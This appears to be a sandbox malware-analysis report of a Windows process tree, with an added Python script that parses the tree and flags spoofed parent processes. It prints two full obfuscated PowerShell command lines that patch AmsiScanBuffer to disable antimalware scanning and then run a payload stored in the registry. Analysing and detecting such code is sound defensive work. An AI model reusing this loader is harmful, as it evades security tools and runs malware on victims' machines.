C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jsBBwFSiMSOA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XuIAgtFPvYHavm,[Parameter(Position=1)][Type]$MKdDtJgvOg)$PfHYSRNxgZY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+'Ans'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$PfHYSRNxgZY.DefineConstructor('R'+'T'+'Speci'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XuIAgtFPvYHavm).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$PfHYSRNxgZY.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+'
'+'i'+''+'r'+''+[Char](116)+''+'u'+'al',$MKdDtJgvOg,$XuIAgtFPvYHavm).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PfHYSRNxgZY.CreateType();}$kOKbJiaYMLkQT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$rQBPZBFvyUurXj=$kOKbJiaYMLkQT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,S'+'t'+''+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVZUuzjgWrLikZEaeyU=jsBBwFSiMSOA @([String])([IntPtr]);$orpEguWPHkXPZXrXjbVVBO=jsBBwFSiMSOA 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IOkfBEGHQYW=$kOKbJiaYMLkQT.GetMethod(''+'G'+'e'+'t'+''+'M'+'o'+'d'+'ul'+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$rUlkBNhpIGipZg=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$ofwiIbrtKmiJKaSTR=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$pHaTkJQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUlkBNhpIGipZg,$EVZUuzjgWrLikZEaeyU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$ASBwPxmhZsbsjPPRa=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$pHaTkJQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ewTJZjpilC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,4,[ref]$ewTJZjpilC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ASBwPxmhZsbsjPPRa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,0x20,[ref]$ewTJZjpilC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+'r'+'s'+'t'+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:7068 -
C:\Windows\System32\Conhost.exe  (cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)  level 3  PID:2956
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:iDHfkoMYkNLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsmjiEJnYbJzNN,[Parameter(Position=1)][Type]$YWzTSnRgNX)$DilHVAVClKq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'dul'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DilHVAVClKq.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+'lN'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QsmjiEJnYbJzNN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$DilHVAVClKq.DefineMethod(''+[Char](73)+''+'n'+''+'v'+'o'+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+
'eB'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$YWzTSnRgNX,$QsmjiEJnYbJzNN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $DilHVAVClKq.CreateType();}$ycRQcpyqZDPil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$KkyKndUTItPXvG=$ycRQcpyqZDPil.GetMethod(''+'G'+'e'+[Char](116)+'Pro'+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UVbndFTogdwGxvFnyAt=iDHfkoMYkNLb @([String])([IntPtr]);$zCwhPmYmctrvPRsuRzyVxM=iDHfkoMYkNLb 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uHiiOMqiOqk=$ycRQcpyqZDPil.GetMethod('G'+[Char](101)+'t'+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$QyKHXnkBaPmncH=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$XcLbDrsjcythStgYh=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$VwTyIoZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyKHXnkBaPmncH,$UVbndFTogdwGxvFnyAt).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$ahOoZlrjRInzsvYNc=$KkyKndUTItPXvG.Invoke($Null,@([Object]$VwTyIoZ,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QHEEOMZuNl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,4,[ref]$QHEEOMZuNl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ahOoZlrjRInzsvYNc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,0x20,[ref]$QHEEOMZuNl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+'ialers'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:5664 -
C:\Windows\System32\Conhost.exe  (cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)  level 3  PID:5724
-
-
-
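The four PowerShell entries above are level-2 children in this listing, each tagged with NtCreateUserProcessOtherParentProcess, and three of them get a level-3 conhost.exe. Working out who spawned whom from the flattened notation is tedious by eye, so the Python script below parses it. It is an added example, not part of the sandbox report: it rebuilds parent/child links from the level digits (a level-n entry belongs to the nearest level n-1 entry above it, which is how the listing nests), attaches the signature bullets and the PID line that can follow an entry, and then flags the relationships worth a second look. Its input is a constructed excerpt of the tree on this page with the PowerShell command lines truncated to {...}; the list of images winlogon.exe is expected to spawn is my assumption.

```python
"""Parse the flattened process-tree notation used in this report into
parent/child links and flag the relationships worth a second look.
Added example; not part of the sandbox report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt in the page's own notation: image path immediately followed
# by the command line, a level digit, the ⤵ marker and PID:N. When signature
# bullets follow an entry, its PID:N comes after them on its own line; bare "-"
# lines are list residue. PowerShell command lines are truncated to "{...}".
SAMPLE_TREE = r"""
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:600
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1036
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1264 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{...}"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{...}"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5192
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3536 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx2⤵PID:4660
"""

# path = drive letter up to the first .exe/.EXE, cmd = everything up to the
# level digit that precedes ⤵, then an optional inline PID and trailing "-".
ENTRY_RE = re.compile(
    r"^(?P<path>[A-Za-z]:\\.*?\.(?:exe|EXE))(?P<cmd>.*?)(?P<depth>\d)⤵"
    r"(?:PID:(?P<pid>\d+))?\s*-?\s*$"
)
PID_RE = re.compile(r"^PID:(\d+)")


@dataclass
class Proc:
    path: str
    cmdline: str
    depth: int
    pid: Optional[int] = None
    parent: Optional["Proc"] = None
    signatures: List[str] = field(default_factory=list)

    @property
    def image(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()


def parse_tree(text: str) -> List[Proc]:
    """Build Proc records; a level-n entry is a child of the nearest
    level n-1 entry above it."""
    procs: List[Proc] = []
    stack: List[Proc] = []          # open ancestors, one per level
    current: Optional[Proc] = None  # entry still collecting bullets / PID
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        m = ENTRY_RE.match(line)
        if m:
            depth = int(m["depth"])
            while stack and stack[-1].depth >= depth:
                stack.pop()
            current = Proc(m["path"], m["cmd"], depth,
                           int(m["pid"]) if m["pid"] else None,
                           stack[-1] if stack else None)
            procs.append(current)
            stack.append(current)
        elif line.startswith("- ") and current is not None:
            current.signatures.append(line[2:])
        else:
            pm = PID_RE.match(line)
            if pm and current is not None and current.pid is None:
                current.pid = int(pm.group(1))
    return procs


# Assumption: the only images winlogon.exe spawns on a clean Windows 10 desktop.
WINLOGON_CHILDREN_OK = {"dwm.exe", "userinit.exe", "logonui.exe", "fontdrvhost.exe"}
SPOOF_SIG = "Suspicious use of NtCreateUserProcessOtherParentProcess"


def suspicious_relations(procs: List[Proc]) -> List[str]:
    """One line per relationship that should not occur on a clean host."""
    out = []
    for p in procs:
        parent = p.parent
        if parent and parent.image == "winlogon.exe" and p.image not in WINLOGON_CHILDREN_OK:
            out.append(f"PID {p.pid}: {p.image} recorded as a child of winlogon.exe (PID {parent.pid})")
        if (parent and parent.image == "svchost.exe" and "-s Schedule" in parent.cmdline
                and p.image == "powershell.exe"):
            out.append(f"PID {p.pid}: powershell.exe started from the Task Scheduler service host (PID {parent.pid})")
        if SPOOF_SIG in p.signatures:
            out.append(f"PID {p.pid}: {SPOOF_SIG}; the recorded parent may not be the creator")
    return out


def by_pid(procs: List[Proc], pid: int) -> Proc:
    return next(p for p in procs if p.pid == pid)


if __name__ == "__main__":
    tree = parse_tree(SAMPLE_TREE)
    for p in tree:
        print(f"{'  ' * (p.depth - 1)}{p.image} pid={p.pid} parent={p.parent.pid if p.parent else None}")
    print(*suspicious_relations(tree), sep="\n")
```

On the sample this yields five findings: dllhost.exe recorded under winlogon.exe, and for each PowerShell entry both its start from the Task Scheduler service host and the sandbox's parent-mismatch signature. The caveat is the one the signature name implies: when a process is created with an explicit parent handle, the recorded parent is the chosen one, so the tree shows where the creator wanted the process to appear, not who issued the create call. On a live host the equivalent check compares the parent in the process-creation event with the process that actually made the call, which is the mismatch the sandbox signature reports.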
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc)  level 1  PID:1416
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem)  level 1  PID:1424
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes)  level 1  PID:1452
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc)  level 1  PID:1504
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc)  level 1  PID:1560
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager)  level 1  PID:1644
C:\Windows\system32\sihost.exe  (cmdline: sihost.exe)  level 2  PID:3116
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS)  level 1  PID:1696
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder)  level 1  PID:1744
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm)  level 1  PID:1760
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p)  level 1
- Modifies Internet Explorer settings
PID:1860
C:\Windows\system32\AUDIODG.EXE  (cmdline: C:\Windows\system32\AUDIODG.EXE 0x2fc 0x320)  level 2
- Suspicious use of AdjustPrivilegeToken
PID:2424
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache)  level 1  PID:2040
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p)  level 1  PID:1184
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p)  level 1  PID:1240
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository)  level 1  PID:1312
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt)  level 1
- Suspicious use of AdjustPrivilegeToken
PID:1552
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection)  level 1  PID:2060
C:\Windows\System32\spoolsv.exe  (cmdline: C:\Windows\System32\spoolsv.exe)  level 1  PID:2180
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation)  level 1  PID:2372
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc)  level 1  PID:2464
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc)  level 1
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2636
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT)  level 1  PID:2648
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent)  level 1  PID:2656
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer)  level 1  PID:2708
C:\Windows\sysmon.exe  (cmdline: C:\Windows\sysmon.exe)  level 1  PID:2732
C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks)  level 1  PID:2768
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService)  level 1  PID:2780
C:\Windows\system32\wbem\unsecapp.exe  (cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding)  level 1  PID:2896
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc)  level 1  PID:3164
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker)  level 1  PID:3312
C:\Windows\system32\svchost.exe  (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc)  level 1  PID:3452
C:\Windows\Explorer.EXE  (cmdline: C:\Windows\Explorer.EXE)  level 1
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3536
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx)  level 2
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4660
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ff9a64a46f8,0x7ff9a64a4708,0x7ff9a64a4718)  level 3  PID:4420
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2)  level 3  PID:3752
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3)  level 3
- Suspicious behavior: EnumeratesProcesses
PID:1620
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8)  level 3  PID:1688
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1)  level 3  PID:5076
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1)  level 3  PID:4784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1)  level 3  PID:4928
-
-
